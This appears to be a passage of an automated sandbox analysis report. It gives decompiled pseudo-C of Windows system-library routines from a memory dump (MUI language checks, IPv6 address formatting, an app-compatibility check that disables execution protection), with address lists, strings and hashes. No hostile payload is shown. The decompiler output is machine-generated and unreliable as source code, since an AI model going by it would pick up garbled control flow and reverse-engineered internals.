                                                                                                                                                  							E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                  							_v40 = _t318;
                                                                                                                                                  							_v20 = _t318;
                                                                                                                                                  						}
                                                                                                                                                  						if(_v8 != _t318) {
                                                                                                                                                  							E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  						}
                                                                                                                                                  						_v8 = _t318;
                                                                                                                                                  						goto L30;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t284 = _v24;
                                                                                                                                                  				_t322 = _t284 + 4;
                                                                                                                                                  				_push(_t284);
                                                                                                                                                  				_v48 = _t322;
                                                                                                                                                  				E0255718A(_t284);
                                                                                                                                                  				_t339 = _t335 + 4;
                                                                                                                                                  				if(_t322 == _t318) {
                                                                                                                                                  					_v28 = _t318;
                                                                                                                                                  				} else {
                                                                                                                                                  					_v28 = E0253E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                  				}
                                                                                                                                                  				if(_v28 == _t318) {
                                                                                                                                                  					_v48 = _t318;
                                                                                                                                                  					goto L58;
                                                                                                                                                  				} else {
                                                                                                                                                  					E02532340(_v28, _v8, _v24);
                                                                                                                                                  					_v16 = _v28;
                                                                                                                                                  					_a4 = _t318;
                                                                                                                                                  					_t288 = E0254E679(_v28, _t332);
                                                                                                                                                  					_t335 = _t339 + 0x14;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_v12 = _t288;
                                                                                                                                                  						if(_t288 == _t318) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_v12 = _v12 + 2;
                                                                                                                                                  						 *_v12 = 0;
                                                                                                                                                  						E0253E2A8(_v12,  &_v68, _v16);
                                                                                                                                                  						if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  							_a4 = _a4 + 1;
                                                                                                                                                  						}
                                                                                                                                                  						_v16 = _v12;
                                                                                                                                                  						_t288 = E0254E679(_v12, _t332);
                                                                                                                                                  						_pop(_t322);
                                                                                                                                                  					}
                                                                                                                                                  					_t296 = _v16;
                                                                                                                                                  					if( *_v16 != _t318) {
                                                                                                                                                  						E0253E2A8(_t322,  &_v68, _t296);
                                                                                                                                                  						if(E02555553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                  							_a4 = _a4 + 1;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(_a4 == _t318) {
                                                                                                                                                  						E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                  						_v48 = _t318;
                                                                                                                                                  						_v28 = _t318;
                                                                                                                                                  					}
                                                                                                                                                  					if(_v8 != _t318) {
                                                                                                                                                  						E0253E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                  					}
                                                                                                                                                  					_v8 = _t318;
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  			}





































                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558b04
                                                                                                                                                  0x02558a0e
                                                                                                                                                  0x02558a11
                                                                                                                                                  0x02558a14
                                                                                                                                                  0x02558a15
                                                                                                                                                  0x02558a18
                                                                                                                                                  0x02558a22
                                                                                                                                                  0x02558b59
                                                                                                                                                  0x02558a28
                                                                                                                                                  0x02558a3c
                                                                                                                                                  0x02558a3c
                                                                                                                                                  0x02558a42
                                                                                                                                                  0x025a1bb0
                                                                                                                                                  0x025a1b11
                                                                                                                                                  0x025a1b11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558a48
                                                                                                                                                  0x02558a51
                                                                                                                                                  0x02558a5b
                                                                                                                                                  0x02558a5e
                                                                                                                                                  0x02558a61
                                                                                                                                                  0x02558a69
                                                                                                                                                  0x02558a69
                                                                                                                                                  0x02558a6d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558a74
                                                                                                                                                  0x02558a7c
                                                                                                                                                  0x02558a7d
                                                                                                                                                  0x02558a91
                                                                                                                                                  0x02558a93
                                                                                                                                                  0x02558a93
                                                                                                                                                  0x02558a98
                                                                                                                                                  0x02558a9b
                                                                                                                                                  0x02558aa1
                                                                                                                                                  0x02558aa1
                                                                                                                                                  0x02558aa4
                                                                                                                                                  0x02558aaa
                                                                                                                                                  0x02558ab1
                                                                                                                                                  0x02558ac5
                                                                                                                                                  0x02558ac7
                                                                                                                                                  0x02558ac7
                                                                                                                                                  0x02558ac5
                                                                                                                                                  0x02558ace
                                                                                                                                                  0x025a1bc9
                                                                                                                                                  0x025a1bce
                                                                                                                                                  0x025a1bd2
                                                                                                                                                  0x025a1bd2
                                                                                                                                                  0x02558ad8
                                                                                                                                                  0x02558aeb
                                                                                                                                                  0x02558aeb
                                                                                                                                                  0x02558af0
                                                                                                                                                  0x02558af4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558af4
                                                                                                                                                  0x02558a42
                                                                                                                                                  0x02558926
                                                                                                                                                  0x02558929
                                                                                                                                                  0x0255892c
                                                                                                                                                  0x0255892d
                                                                                                                                                  0x02558930
                                                                                                                                                  0x02558935
                                                                                                                                                  0x0255893a
                                                                                                                                                  0x02558b51
                                                                                                                                                  0x02558940
                                                                                                                                                  0x02558954
                                                                                                                                                  0x02558954
                                                                                                                                                  0x0255895a
                                                                                                                                                  0x025a1b63
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558960
                                                                                                                                                  0x02558969
                                                                                                                                                  0x02558973
                                                                                                                                                  0x02558976
                                                                                                                                                  0x02558979
                                                                                                                                                  0x0255897e
                                                                                                                                                  0x02558981
                                                                                                                                                  0x02558981
                                                                                                                                                  0x02558986
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025a1b6e
                                                                                                                                                  0x025a1b74
                                                                                                                                                  0x025a1b7b
                                                                                                                                                  0x025a1b8f
                                                                                                                                                  0x025a1b91
                                                                                                                                                  0x025a1b91
                                                                                                                                                  0x025a1b99
                                                                                                                                                  0x025a1b9c
                                                                                                                                                  0x025a1ba2
                                                                                                                                                  0x025a1ba2
                                                                                                                                                  0x0255898c
                                                                                                                                                  0x02558992
                                                                                                                                                  0x02558999
                                                                                                                                                  0x025589ad
                                                                                                                                                  0x025a1ba8
                                                                                                                                                  0x025a1ba8
                                                                                                                                                  0x025589ad
                                                                                                                                                  0x025589b6
                                                                                                                                                  0x025589c8
                                                                                                                                                  0x025589cd
                                                                                                                                                  0x025589d0
                                                                                                                                                  0x025589d0
                                                                                                                                                  0x025589d6
                                                                                                                                                  0x025589e8
                                                                                                                                                  0x025589e8
                                                                                                                                                  0x025589ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025589ed
                                                                                                                                                  0x0255895a
                                                                                                                                                  0x0255883e
                                                                                                                                                  0x02558841
                                                                                                                                                  0x02558844
                                                                                                                                                  0x02558845
                                                                                                                                                  0x02558848
                                                                                                                                                  0x0255884d
                                                                                                                                                  0x02558852
                                                                                                                                                  0x02558b49
                                                                                                                                                  0x02558858
                                                                                                                                                  0x0255886c
                                                                                                                                                  0x0255886c
                                                                                                                                                  0x02558872
                                                                                                                                                  0x025a1b0e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558878
                                                                                                                                                  0x02558881
                                                                                                                                                  0x0255888b
                                                                                                                                                  0x0255888e
                                                                                                                                                  0x02558891
                                                                                                                                                  0x02558896
                                                                                                                                                  0x02558899
                                                                                                                                                  0x02558899
                                                                                                                                                  0x0255889e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025a1b21
                                                                                                                                                  0x025a1b27
                                                                                                                                                  0x025a1b2e
                                                                                                                                                  0x025a1b42
                                                                                                                                                  0x025a1b44
                                                                                                                                                  0x025a1b44
                                                                                                                                                  0x025a1b4c
                                                                                                                                                  0x025a1b4f
                                                                                                                                                  0x025a1b55
                                                                                                                                                  0x025a1b55
                                                                                                                                                  0x025588a4
                                                                                                                                                  0x025588aa
                                                                                                                                                  0x025588b1
                                                                                                                                                  0x025588c5
                                                                                                                                                  0x025a1b5b
                                                                                                                                                  0x025a1b5b
                                                                                                                                                  0x025588c5
                                                                                                                                                  0x025588ce
                                                                                                                                                  0x025588e0
                                                                                                                                                  0x025588e5
                                                                                                                                                  0x025588e8
                                                                                                                                                  0x025588e8
                                                                                                                                                  0x025588ee
                                                                                                                                                  0x02558900
                                                                                                                                                  0x02558900
                                                                                                                                                  0x02558905
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02558905

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 02558827
                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 025589FC
                                                                                                                                                  • WindowsExcludedProcs, xrefs: 025587C1
                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 025587E6
                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 02558914
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcspbrk
                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                  • API String ID: 402402107-258546922
                                                                                                                                                  • Opcode ID: ed4a9ba0782b870ce569749aa0ada4372d980c72b55ca5998c227373e1c16718
                                                                                                                                                  • Instruction ID: f9cfe3c141921af4e8ead161140065dfcbf1465854e6abc7539978602ea76470
                                                                                                                                                  • Opcode Fuzzy Hash: ed4a9ba0782b870ce569749aa0ada4372d980c72b55ca5998c227373e1c16718
                                                                                                                                                  • Instruction Fuzzy Hash: 83F108B2D00219EFCF11DF94C995AEEBBB9FF48304F14446AE905A7210E734AA45CF68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 38%
                                                                                                                                                  			E025713CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				intOrPtr* _v16;
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				signed int _t78;
                                                                                                                                                  				signed int _t86;
                                                                                                                                                  				char _t90;
                                                                                                                                                  				signed int _t91;
                                                                                                                                                  				signed int _t96;
                                                                                                                                                  				intOrPtr _t108;
                                                                                                                                                  				signed int _t114;
                                                                                                                                                  				void* _t115;
                                                                                                                                                  				intOrPtr _t128;
                                                                                                                                                  				intOrPtr* _t129;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  
                                                                                                                                                  				_t129 = _a4;
                                                                                                                                                  				_t128 = _a8;
                                                                                                                                                  				_t116 = 0;
                                                                                                                                                  				_t71 = _t128 + 0x5c;
                                                                                                                                                  				_v8 = 8;
                                                                                                                                                  				_v20 = _t71;
                                                                                                                                                  				if( *_t129 == 0) {
                                                                                                                                                  					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                  						goto L5;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                  						if(_t96 != 0) {
                                                                                                                                                  							L38:
                                                                                                                                                  							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                  								goto L5;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  								_t86 = E02567707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                  								L36:
                                                                                                                                                  								return _t128 + _t86 * 2;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                  						if(_t114 == 0) {
                                                                                                                                                  							L33:
                                                                                                                                                  							_t115 = 0x2532926;
                                                                                                                                                  							L35:
                                                                                                                                                  							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                  							_t86 = E02567707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                  							goto L36;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t114 != 0xffff) {
                                                                                                                                                  							_t116 = 0;
                                                                                                                                                  							goto L38;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t114 != 0) {
                                                                                                                                                  							_t115 = 0x2539cac;
                                                                                                                                                  							goto L35;
                                                                                                                                                  						}
                                                                                                                                                  						goto L33;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					L5:
                                                                                                                                                  					_a8 = _t116;
                                                                                                                                                  					_a4 = _t116;
                                                                                                                                                  					_v12 = _t116;
                                                                                                                                                  					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                  						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                  							_v8 = 6;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t90 = _v8;
                                                                                                                                                  					if(_t90 <= _t116) {
                                                                                                                                                  						L11:
                                                                                                                                                  						if(_a8 - _a4 <= 1) {
                                                                                                                                                  							_a8 = _t116;
                                                                                                                                                  							_a4 = _t116;
                                                                                                                                                  						}
                                                                                                                                                  						_t91 = 0;
                                                                                                                                                  						if(_v8 <= _t116) {
                                                                                                                                                  							L22:
                                                                                                                                                  							if(_v8 < 8) {
                                                                                                                                                  								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                  								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                  								_t128 = _t128 + E02567707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                  							}
                                                                                                                                                  							return _t128;
                                                                                                                                                  						} else {
                                                                                                                                                  							L14:
                                                                                                                                                  							L14:
                                                                                                                                                  							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                  								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                  									_push(":");
                                                                                                                                                  									_push(_t71 - _t128 >> 1);
                                                                                                                                                  									_push(_t128);
                                                                                                                                                  									_t128 = _t128 + E02567707() * 2;
                                                                                                                                                  									_t71 = _v20;
                                                                                                                                                  									_t130 = _t130 + 0xc;
                                                                                                                                                  								}
                                                                                                                                                  								_t78 = E02567707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                  								_t130 = _t130 + 0x10;
                                                                                                                                                  							} else {
                                                                                                                                                  								_push(L"::");
                                                                                                                                                  								_push(_t71 - _t128 >> 1);
                                                                                                                                                  								_push(_t128);
                                                                                                                                                  								_t78 = E02567707();
                                                                                                                                                  								_t130 = _t130 + 0xc;
                                                                                                                                                  								_t91 = _a8 - 1;
                                                                                                                                                  							}
                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                  							_t128 = _t128 + _t78 * 2;
                                                                                                                                                  							_t71 = _v20;
                                                                                                                                                  							if(_t91 >= _v8) {
                                                                                                                                                  								goto L22;
                                                                                                                                                  							}
                                                                                                                                                  							_t116 = 0;
                                                                                                                                                  							goto L14;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t108 = 1;
                                                                                                                                                  						_v16 = _t129;
                                                                                                                                                  						_v24 = _t90;
                                                                                                                                                  						do {
                                                                                                                                                  							if( *_v16 == _t116) {
                                                                                                                                                  								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                  									_a4 = _v12;
                                                                                                                                                  									_a8 = _t108;
                                                                                                                                                  								}
                                                                                                                                                  								_t116 = 0;
                                                                                                                                                  							} else {
                                                                                                                                                  								_v12 = _t108;
                                                                                                                                                  							}
                                                                                                                                                  							_v16 = _v16 + 2;
                                                                                                                                                  							_t108 = _t108 + 1;
                                                                                                                                                  							_t26 =  &_v24;
                                                                                                                                                  							 *_t26 = _v24 - 1;
                                                                                                                                                  						} while ( *_t26 != 0);
                                                                                                                                                  						goto L11;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}




















                                                                                                                                                  0x02571406
                                                                                                                                                  0x0259e9cc
                                                                                                                                                  0x0259e9d2
                                                                                                                                                  0x0259e9d2
                                                                                                                                                  0x0259e9cc
                                                                                                                                                  0x0257140c
                                                                                                                                                  0x02571411
                                                                                                                                                  0x02571431
                                                                                                                                                  0x0257143a
                                                                                                                                                  0x0257143c
                                                                                                                                                  0x0257143f
                                                                                                                                                  0x0257143f
                                                                                                                                                  0x02571442
                                                                                                                                                  0x02571447
                                                                                                                                                  0x025714a8
                                                                                                                                                  0x025714ac
                                                                                                                                                  0x0259e9e2
                                                                                                                                                  0x0259e9e7
                                                                                                                                                  0x0259e9ec
                                                                                                                                                  0x0259ea05
                                                                                                                                                  0x0259ea05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02571449
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02571449
                                                                                                                                                  0x0257144c
                                                                                                                                                  0x02571459
                                                                                                                                                  0x02571462
                                                                                                                                                  0x02571469
                                                                                                                                                  0x0257146a
                                                                                                                                                  0x02571470
                                                                                                                                                  0x02571473
                                                                                                                                                  0x02571476
                                                                                                                                                  0x02571476
                                                                                                                                                  0x02571490
                                                                                                                                                  0x02571495
                                                                                                                                                  0x0257138e
                                                                                                                                                  0x02571390
                                                                                                                                                  0x02571397
                                                                                                                                                  0x02571398
                                                                                                                                                  0x02571399
                                                                                                                                                  0x025713a1
                                                                                                                                                  0x025713a4
                                                                                                                                                  0x025713a4
                                                                                                                                                  0x02571498
                                                                                                                                                  0x0257149c
                                                                                                                                                  0x0257149f
                                                                                                                                                  0x025714a2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025714a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025714a4
                                                                                                                                                  0x02571413
                                                                                                                                                  0x02571415
                                                                                                                                                  0x02571416
                                                                                                                                                  0x02571419
                                                                                                                                                  0x0257141c
                                                                                                                                                  0x02571422
                                                                                                                                                  0x025713b7
                                                                                                                                                  0x025713bc
                                                                                                                                                  0x025713bf
                                                                                                                                                  0x025713bf
                                                                                                                                                  0x025713c2
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571424
                                                                                                                                                  0x02571427
                                                                                                                                                  0x0257142b
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x0257142c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0257141c
                                                                                                                                                  0x02571411

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: ca39c414ede019db7aa83c0d8719a61563c027809485fcae73852bb22b93ea1c
                                                                                                                                                  • Instruction ID: a2e712867c7604122859c54cab7cfc449a53ff438eaaf38f5b5201e84fc001e3
                                                                                                                                                  • Opcode Fuzzy Hash: ca39c414ede019db7aa83c0d8719a61563c027809485fcae73852bb22b93ea1c
                                                                                                                                                  • Instruction Fuzzy Hash: F66135B1D10A56AADF34CF69D8809BEBFB6FF84304B14C52EE49A47640D774A640CB68
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E02567EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v540;
                                                                                                                                                  				unsigned int _v544;
                                                                                                                                                  				signed int _v548;
                                                                                                                                                  				intOrPtr _v552;
                                                                                                                                                  				char _v556;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t33;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				unsigned int _t46;
                                                                                                                                                  				unsigned int _t47;
                                                                                                                                                  				unsigned int _t52;
                                                                                                                                                  				intOrPtr _t56;
                                                                                                                                                  				unsigned int _t62;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				signed int _t73;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				void* _t77;
                                                                                                                                                  
                                                                                                                                                  				_t33 =  *0x2612088; // 0x7775eb7f
                                                                                                                                                  				_v8 = _t33 ^ _t73;
                                                                                                                                                  				_v548 = _v548 & 0x00000000;
                                                                                                                                                  				_t72 = _a4;
                                                                                                                                                  				if(E02567F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                  					__eflags = _v548;
                                                                                                                                                  					if(_v548 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_t62 = _t72 + 0x24;
                                                                                                                                                  					E02583F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                  					_t71 = 0x214;
                                                                                                                                                  					_v544 = 0x214;
                                                                                                                                                  					E0253DFC0( &_v540, 0, 0x214);
                                                                                                                                                  					_t75 = _t74 + 0x20;
                                                                                                                                                  					_t46 =  *0x2614218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                  					__eflags = _t46;
                                                                                                                                                  					if(_t46 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_t47 = _v544;
                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t47 - 0x214;
                                                                                                                                                  					if(_t47 >= 0x214) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t62);
                                                                                                                                                  					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                  					E02583F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                  					_t52 = E02540D27( &_v540, L"Execute=1");
                                                                                                                                                  					_t76 = _t75 + 0x1c;
                                                                                                                                                  					_push(_t62);
                                                                                                                                                  					__eflags = _t52;
                                                                                                                                                  					if(_t52 == 0) {
                                                                                                                                                  						E02583F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                  						_t71 =  &_v540;
                                                                                                                                                  						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                  						_t77 = _t76 + 0x14;
                                                                                                                                                  						_v552 = _t56;
                                                                                                                                                  						__eflags = _t71 - _t56;
                                                                                                                                                  						if(_t71 >= _t56) {
                                                                                                                                                  							goto L1;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L10:
                                                                                                                                                  							_t62 = E02548375(_t71, 0x20);
                                                                                                                                                  							_pop(_t69);
                                                                                                                                                  							__eflags = _t62;
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								 *_t62 = 0;
                                                                                                                                                  							}
                                                                                                                                                  							E02583F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                  							_t77 = _t77 + 0x10;
                                                                                                                                                  							E025AE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                  							__eflags = _t62;
                                                                                                                                                  							if(_t62 == 0) {
                                                                                                                                                  								goto L1;
                                                                                                                                                  							}
                                                                                                                                                  							_t31 = _t62 + 2; // 0x2
                                                                                                                                                  							_t71 = _t31;
                                                                                                                                                  							__eflags = _t71 - _v552;
                                                                                                                                                  							if(_t71 >= _v552) {
                                                                                                                                                  								goto L1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                  					_push(3);
                                                                                                                                                  					_push(0x55);
                                                                                                                                                  					E02583F92();
                                                                                                                                                  					_t38 = 1;
                                                                                                                                                  					L2:
                                                                                                                                                  					return E0253E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				_t38 = 0;
                                                                                                                                                  				goto L2;
                                                                                                                                                  			}




























                                                                                                                                                  APIs
                                                                                                                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02583F12
                                                                                                                                                  Strings
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02583F4A
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02583F75
                                                                                                                                                  • Execute=1, xrefs: 02583F5E
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0258E2FB
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02583EC4
                                                                                                                                                  • ExecuteOptions, xrefs: 02583F04
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0258E345
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BaseDataModuleQuery
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
